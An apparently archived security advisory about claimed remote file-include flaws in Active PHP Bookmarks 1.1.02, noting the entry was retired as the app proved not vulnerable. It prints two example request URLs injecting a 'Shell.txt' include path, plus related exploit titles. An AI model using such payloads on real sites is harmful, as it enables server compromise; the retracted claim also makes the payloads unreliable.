source: http://www.securityfocus.com/bid/21263/info Active PHP Bookmarks application is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. Version 1.1.02 is vulnerable to this issue; other versions may also be affected. This BID is being retired because further analysis reveals that the application is not vulnerable. http://www.example.com/[Script_Path]/apb_common.php?APB_SETTINGS['apb_path']=Shell.txt? http://www.example.com/[Script_Path]/apb.php?APB_SETTINGS['apb_path']=Shell.txt?
Related ExploitsOther Possible E-DB Search Terms: Active PHP BookMarks 1.1.2, Active PHP BookMarks
|2007-04-25||Active PHP BookMarks 1.0 - 'APB.php' Remote File Inclusion||Ali & Saeid|
|2008-08-19||Active PHP BookMarks 1.1.02 - SQL Injection||Hussin X|
|2009-12-22||Active PHP BookMarks 1.3 - SQL Injection||Mr.Elgaarh|